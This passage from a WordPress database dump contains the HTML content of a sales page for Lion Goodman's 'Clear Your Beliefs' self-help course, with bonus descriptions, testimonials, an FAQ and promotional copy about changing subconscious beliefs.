size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies, and from the comfort of your own home. Each class session helps you learn specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes plus two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they have had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>\r\njQuery(document).ready(function() { \r\nvar is_chrome = window.chrome; \r\n if (is_chrome) { \r\n jQuery(''h5.hdr'').css(''font-size'', ''51px!important'');\r\n } \r\n});\r\n</script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 21:42:30', '2014-06-18 02:42:30', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1005, 4194, '2014-06-17 21:46:41', '2014-06-18 02:46:41', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be 